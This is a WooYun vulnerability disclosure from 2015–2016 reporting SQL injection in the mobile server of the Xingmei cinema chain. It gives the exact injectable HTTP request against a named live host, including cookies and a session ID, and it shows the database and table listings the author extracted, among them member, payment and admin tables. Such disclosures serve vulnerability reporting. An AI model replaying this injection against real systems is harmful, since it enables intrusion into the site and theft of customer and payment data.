星美国际电影城手机端服务器SQL一枚 | wooyun-2015-0163329| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0163329

漏洞标题：星美国际电影城手机端服务器SQL一枚

漏洞作者： seck

提交时间：2015-12-21 22:12

修复时间：2016-02-04 17:47

公开时间：2016-02-04 17:47

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-21：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-02-04：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

星美国际电影城手机端服务器，存在sql注入。

详细说明：

GET /include/showing_ajax.php?cinema_id=*&date_str=2015-12-20&film_id_str=001105952015,001205952015,001405952015,001905952015&op=get_search_showing_list&return_type=json HTTP/1.1
Cookie: Hm_lpvt_636ba4c238f25f3f8b5fe3c8aad97ded=1450615961; Hm_lvt_636ba4c238f25f3f8b5fe3c8aad97ded=1450615961; _cityid=1001; _selectCinema_id=XM20003402; _selectCinema_aid=108693; PHPSESSID=i7ijhp9hpqq3mav1hkgbvunh97
Host: m.ixingmei.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

漏洞证明：

available databases [24]:
[*] cms
[*] information_schema
[*] mysql
[*] performance_schema
[*] pl_account_db
[*] pl_ad_db
[*] pl_app_db
[*] pl_common_db
[*] pl_general_db
[*] pl_hot_db
[*] pl_im_db
[*] pl_image_db
[*] pl_mc_db
[*] pl_mobile
[*] pl_movie_db
[*] pl_openfire_db
[*] pl_quartz_db
[*] pl_sender_db
[*] pl_star_db
[*] pl_user_db
[*] pl_visit_db
[*] sns
[*] ucenter
[*] webistrano_development

carriage_to                      |
cms_active_count                 |
cms_active_log                   |
cms_addon_activity               |
cms_addon_chimelong              |
cms_addon_cinema                 |
cms_addon_cinema_copy            |
cms_addon_cinema_copy1           |
cms_addon_film                   |
cms_addon_hall                   |
cms_addon_product                |
cms_addon_seat_area              |
cms_addon_show                   |
cms_addon_showing                |
cms_addon_star                   |
cms_addon_venue                  |
cms_addon_video                  |
cms_addonarticle                 |
cms_addonimages                  |
cms_addoninfos                   |
cms_addonshop                    |
cms_addonsoft                    |
cms_addonspec                    |
cms_admin                        |
cms_admintype                    |
cms_advancedsearch               |
cms_apply_flink                  |
cms_arcatt                       |
cms_arccache                     |
cms_archives                     |
cms_arcmulti                     |
cms_arcrank                      |
cms_arctiny                      |
cms_arctype                      |
cms_area                         |
cms_banner                       |
cms_bannertype                   |
cms_channeltype                  |
cms_co_htmls                     |
cms_co_mediaurls                 |
cms_co_note                      |
cms_co_onepage                   |
cms_co_urls                      |
cms_district                     |
cms_district_bak                 |
cms_district_copy                |
cms_diyforms                     |
cms_downloads                    |
cms_erradd                       |
cms_feedback                     |
cms_flink                        |
cms_flinktype                    |
cms_freelist                     |
cms_homepageset                  |
cms_keywords                     |
cms_log                          |
cms_mail_order                   |
cms_mail_title                   |
cms_mail_type                    |
cms_member                       |
cms_member_address               |
cms_member_bak                   |
cms_member_captcha               |
cms_member_company               |
cms_member_copy                  |
cms_member_copy_20130702         |
cms_member_feed                  |
cms_member_flink                 |
cms_member_friends               |
cms_member_group                 |
cms_member_guestbook             |
cms_member_invite                |
cms_member_mobile_captcha        |
cms_member_model                 |
cms_member_msg                   |
cms_member_operation             |
cms_member_person                |
cms_member_person_copy           |
cms_member_pms                   |
cms_member_snsmsg                |
cms_member_space                 |
cms_member_stow                  |
cms_member_stowtype              |
cms_member_tj                    |
cms_member_type                  |
cms_member_validate              |
cms_member_vhistory              |
cms_moneycard_record             |
cms_moneycard_type               |
cms_mtypes                       |
cms_multiserv_config             |
cms_myad                         |
cms_mytag                        |
cms_payment                      |
cms_plus                         |
cms_pwd_tmp                      |
cms_ratings                      |
cms_scores                       |
cms_search_cache                 |
cms_search_keywords              |
cms_sgpage                       |
cms_shops_delivery               |
cms_shops_orders                 |
cms_shops_products               |
cms_shops_userinfo               |
cms_softconfig                   |
cms_stepselect                   |
cms_sys_enum                     |
cms_sys_module                   |
cms_sys_set                      |
cms_sys_task                     |
cms_sysconfig                    |
cms_tagindex                     |
cms_taglist                      |
cms_test                         |
cms_test_mobile                  |
cms_tl_card_meno                 |
cms_tl_customer                  |
cms_tl_log                       |
cms_uploads                      |
cms_verifies                     |
cms_vote                         |
customer_care                    |
db_access_log                    |
db_access_order                  |
db_access_register               |
db_channel                       |
db_tencent_order                 |
db_tencent_order_cache           |
email_mod                        |
mc_admin_group                   |
mc_admin_index                   |
mc_admin_index_group             |
mc_admin_index_module            |
mc_admin_module                  |
mc_admin_module_group            |
mc_agent_account                 |
mc_fp_bookings                   |
mc_fp_bookings_copy              |
mc_fund_report                   |
mc_kiosk_cinema                  |
mc_kiosk_status                  |
mc_log                           |
mc_msg_tpl                       |
mc_msg_type                      |
mc_pwd_history                   |
mc_review_order                  |
msg_mod                          |
payment_mod                      |
shipping_mod                     |
show_book_order                  |
show_ddt_data                    |
show_detail                      |
show_discount                    |
show_order                       |
show_order_log                   |
show_ticket                      |
show_type_subcat                 |
sms_statsa                       |
tc_activity_area                 |
tc_activity_coupon               |
tc_activity_index                |
tc_activity_inip                 |
tc_activity_invite               |
tc_activity_limit                |
tc_activity_lottery              |
tc_activity_member               |
tc_activity_miaosha              |
tc_activity_miaosha_admin_op_log |
tc_activity_miaosha_item         |
tc_activity_miaosha_item_detail  |
tc_activity_miaosha_member       |
tc_activity_miaosha_rule         |
tc_activity_notice               |
tc_activity_order_detail         |
tc_activity_pois                 |
tc_activity_renren               |
tc_activity_renren_pois          |
tc_activity_scope                |
tc_activity_show                 |
tc_activity_vote                 |
tc_balance_binding               |
tc_balance_info                  |
tc_balance_log                   |
tc_balance_type                  |
tc_balance_user                  |
tc_cb_error                      |
tc_cinema_coupon                 |
tc_cinema_order                  |
tc_class_log                     |
tc_company_lottery               |
tc_coupon_audit                  |
tc_coupon_batch                  |
tc_coupon_card                   |
tc_coupon_gift_tbl               |
tc_coupon_index                  |
tc_coupon_index_copy             |
tc_coupon_info                   |
tc_coupon_return                 |
tc_coupon_return_order           |
tc_coupon_scope                  |
tc_coupon_temp                   |
tc_coupon_type                   |
tc_daily_showing_counter         |
tc_download_sta                  |
tc_exchange_lifecard             |
tc_feedback                      |
tc_fp_cinema                     |
tc_fp_cinema_copy                |
tc_guide_index                   |
tc_guide_record                  |
tc_hall                          |
tc_hiring                        |
tc_ip_limit                      |
tc_keyword_group                 |
tc_keyword_index                 |
tc_lockseats                     |
tc_lottery_index                 |
tc_lottery_info                  |
tc_lottery_log                   |
tc_lowest_price                  |
tc_lucky_draw_log                |
tc_lucky_draw_winners            |
tc_max_hall                      |
tc_member_activity               |
tc_member_bind                   |
tc_member_city_log               |
tc_member_opt                    |
tc_member_vote                   |
tc_member_winners                |
tc_mol_member_ticket             |
tc_mol_member_ticket_lan         |
tc_movie_ticket                  |
tc_movie_ticket_tmp              |
tc_msg                           |
tc_msg_log                       |
tc_new_activity_index            |
tc_new_activity_member           |
tc_newipiao_order                |
tc_op_account                    |
tc_op_strategy_dimensional       |
tc_op_strategy_index             |
tc_op_strategy_info              |
tc_order                         |
tc_order_fail                    |
tc_order_fy                      |
tc_order_ok                      |
tc_order_product                 |
tc_osgh_user_tbl                 |
tc_payment_error                 |
tc_payment_info                  |
tc_payment_scene                 |
tc_payment_type                  |
tc_price_default                 |
tc_price_model                   |
tc_price_period_details          |
tc_price_period_index            |
tc_price_period_scope            |
tc_price_ploy_cal                |
tc_price_ploy_index              |
tc_price_ploy_scope              |
tc_price_purchase                |
tc_price_scope                   |
tc_scores_log                    |
tc_seat                          |
tc_send_sms                      |
tc_serial_allot                  |
tc_serial_info                   |
tc_setting                       |
tc_showing                       |
tc_showing_block                 |
tc_showing_increment_update_log  |
tc_showing_tmp                   |
tc_third_success_order           |
tc_third_ticket                  |
tc_uid_from                      |
tc_unicom_code                   |
tc_user_bind                     |
tc_verify_mobile                 |
tc_xm_card_recharge_log          |
tc_zy_all_cinema                 |
tc_zy_cinema                     |
tc_zy_coupon                     |
tc_zy_order                      |
theme_banner_tbl                 |
theme_index_tbl                  |
ticket_count                     |
travel_order                     |
travel_order_product_bridge      |
travel_product                   |
travel_product_price             |
youbang                          |
---------------------------------+

修复方案：

过滤吧

版权声明：转载请注明来源 seck@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：8 (WooYun评价)

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0163329

漏洞标题：星美国际电影城手机端服务器SQL一枚

相关厂商：星美手机端

漏洞作者： seck

提交时间：2015-12-21 22:12

修复时间：2016-02-04 17:47

公开时间：2016-02-04 17:47

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0163329"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 seck@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：